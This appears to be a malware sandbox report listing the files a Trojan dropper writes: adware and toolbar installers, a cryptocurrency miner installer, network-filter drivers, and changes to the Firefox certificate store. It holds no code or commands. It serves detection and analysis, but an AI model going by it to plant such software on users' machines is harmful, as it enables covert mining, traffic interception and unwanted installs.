C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[2] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\verificar_ip[1].htm (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1] (61315 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe (2736 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe (18984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe (45524 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe (64441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1] (61024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmD143.tmp (3145 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe (64732 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe (64846 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe (34340 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe (33323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1] (1928 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe (32080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe (127352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1] (42448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe (20815 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe (7390 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe (61429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe (31080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe (119929 bytes)
The process powershell.exe:3772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2KY9FDOQT8H9H3WIW6VT.temp (196 bytes)
The process powershell.exe:3656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCWG3ST52CQ8BWKM1ZUM.temp (196 bytes)
The process powershell.exe:3376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\749D80PVBSBBMHTBLUY1.temp (196 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhED6B.tmp (112516 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhEA2F.tmp (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe (872 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\checks.txt (253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\amisid.exe (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\cpuminer-x11opt-setup.exe (151433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\post_reply.htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B7.tmp (3040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe (142739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\nsisos.dll (13 bytes)
The process XTab_Setup2253.exe:1748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (18514 bytes)
%Program Files% (x86)\XTab\conf (1626 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1031.xpi (15 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\ver.txt (47 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (29 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (21280 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5469 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn5B4A.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (15928 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\msvcp110.dll (16990 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
The process cmdshell.exe:3596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\HPNotify.exe (675 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tCE1709AA862C234DD936mp.tmp (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (304 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\conf (79 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\2[1].zip (213534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\one.zip (29636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (76078 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (10136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\two.zip (74342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\1[1].zip (178958 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (12024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowser.exe (5199 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\GOSafer\gosafer.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\GOSafer\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\GOSafer\nfapi.dll (4992 bytes)
%Program Files% (x86)\GOSafer\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\GOSafer\gosaferdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\gosaferdrv.sys (51 bytes)
%Program Files% (x86)\GOSafer\uninst.exe (1793 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssF4BB.tmp (67374 bytes)
%Program Files% (x86)\GOSafer\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\GOSafer\libeay32.dll (35507 bytes)
The process nfregdrv.exe:3588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\DesProtetor\nfapi.dll (118 bytes)
The process nfregdrv.exe:3076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\ActSys\nfapi.dll (118 bytes)
The process nfregdrv.exe:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\CashReminder\nfapi.dll (118 bytes)
The process nfregdrv.exe:3924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\WNet\nfapi.dll (126 bytes)
The process nfregdrv.exe:3192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\GOSafer\nfapi.dll (118 bytes)
The process HPNotify.exe:3640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\conf (1480 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (24 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (24 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (24 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (49 bytes)
The process CashReminder.exe:3984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\CashReminder\ProtocolFilters.dll (249 bytes)
The process CashReminder.exe:1108 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\P_StoreList.txt (784 bytes)
C:\Windows\Temp\P_RuleList.txt (265 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[2].txt (265 bytes)
C:\Windows\Temp\CashReminder\mfs162E.tmp (3516 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\stores[1].htm (784 bytes)
C:\Windows\Temp\CashReminder\mfs310F.tmp (229227 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\CashReminder\libeay32.dll (35507 bytes)
%Program Files% (x86)\CashReminder\nfapi.dll (4992 bytes)
C:\Windows\System32\drivers\crfilterdrv.sys (51 bytes)
%Program Files% (x86)\CashReminder\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscDFF3.tmp (66830 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\CashReminder\CashReminder.exe (15982 bytes)
%Program Files% (x86)\CashReminder\uninstall.exe (1568 bytes)
%Program Files% (x86)\CashReminder\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\CashReminder\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\CashReminder\crfilterdrv.sys (1856 bytes)
The process ActSys.exe:148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\ActSys\ProtocolFilters.dll (49 bytes)
The process ActSys.exe:3756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\ActSys\SSL\NJax Intermediate.cer (774 bytes)
C:\Windows\Temp\ActSys\SSL\cert.db (2 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[4].txt (197 bytes)
C:\Windows\Temp\P_RuleList.txt (197 bytes)
The process certutil.exe:3280 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (720 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\cert8.db (7444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\key3.db (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (364 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\NSISEncrypt.dll (3323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsExec.dll (14 bytes)
The process amisetup2899__9664.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\index[1].htm (1199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe:typelib (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amitest.txt (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\amipb[1].js (21314 bytes)
The process GOSafer.exe:3284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[3].txt (16 bytes)
C:\Windows\Temp\G_RuleList.txt (16 bytes)
The process GOSafer.exe:3264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\GOSafer\ProtocolFilters.dll (249 bytes)
The process WNet.exe:4016 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\WNet\ProtocolFilters.dll (249 bytes)
The process WNet.exe:3080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[1].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)
The process 310714_is.exe:948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\button-bg.png (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\ProgressBar.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo_new[1].png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\bootstrap_42881.html (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\button.css (417 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\declineBG[1].png (461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Yes_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg2.png (978 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\No_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\Rerarapepe_b[1].png (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Yes_Button_Hover[1].png (1 bytes)
